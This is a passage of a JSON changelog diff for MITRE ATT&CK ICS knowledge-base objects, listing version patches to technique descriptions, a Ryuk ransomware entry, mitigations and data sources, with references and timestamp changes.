capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. 
Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:52.173000+00:00\", \"old_value\": \"2025-04-16 21:26:19.328000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0807: Network Allowlists", + "M0930: Network Segmentation", + "M0931: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:50.981000+00:00", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production 
environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 
2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:50.981000+00:00\", \"old_value\": \"2025-04-16 21:26:17.698000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0803: Data Loss Prevention", + "M0809: Operational Information Confidentiality", + "M0922: Restrict File and Directory Permissions", + "M0941: Encrypt Sensitive Information" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-13 20:14:53.171000+00:00", + "modified": "2025-04-22 22:21:23.589000+00:00", + "name": "Ryuk", + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. 
[Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0446", + "external_id": "S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. 
Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group", + "The DFIR Report" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:21:23.589000+00:00\", \"old_value\": \"2025-04-16 20:38:27.373000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][1]\": \"The DFIR Report\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][0]\": \"The DFIR Report, @TheDFIRReport\"}}", + "previous_version": "1.4" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", 
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 16:39:58.291000+00:00", + "modified": "2025-04-25 14:39:12.577000+00:00", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:12.577000+00:00\", \"old_value\": \"2025-04-16 21:26:26.911000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:13.297000+00:00", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. 
DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "revoked": false, + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:13.297000+00:00\", \"old_value\": \"2025-04-16 21:26:27.444000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:16.894000+00:00", + "name": "Mechanical Protection Layers", + "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. 
(Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0805", + "external_id": "M0805" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:16.894000+00:00\", \"old_value\": \"2025-04-16 21:26:29.910000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:13.833000+00:00", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + 
"x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:13.833000+00:00\", \"old_value\": \"2025-04-16 21:26:27.652000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:17.799000+00:00", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "revoked": false, + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:17.799000+00:00\", \"old_value\": \"2025-04-16 21:26:30.453000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": 
"course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 20:15:34.146000+00:00", + "modified": "2025-04-25 14:39:15.463000+00:00", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0920", + "external_id": "M0920" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:15.463000+00:00\", \"old_value\": \"2025-04-16 21:26:28.819000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:20.300000+00:00", + "name": "Safety Instrumented Systems", + "description": "Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . 
Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0812", + "external_id": "M0812" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:20.300000+00:00\", \"old_value\": \"2025-04-16 21:26:32.513000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 19:55:50.927000+00:00", + "modified": "2025-04-25 14:39:19.937000+00:00", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0919", + "external_id": "M0919" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:19.937000+00:00\", \"old_value\": \"2025-04-16 21:26:32.342000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:17.436000+00:00", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "revoked": false, + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:17.436000+00:00\", \"old_value\": \"2025-04-16 21:26:30.248000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-source", + "id": 
"x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.068Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.068Z\", \"old_value\": \"2025-04-16T20:39:10.207Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + 
"source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.700Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.700Z\", \"old_value\": \"2025-04-18T15:12:29.888Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:07.251Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:07.251Z\", \"old_value\": \"2025-04-18T15:12:49.401Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.151Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.151Z\", \"old_value\": \"2025-04-18T15:12:13.134Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.613Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.613Z\", \"old_value\": \"2025-04-18T15:09:58.319Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. 
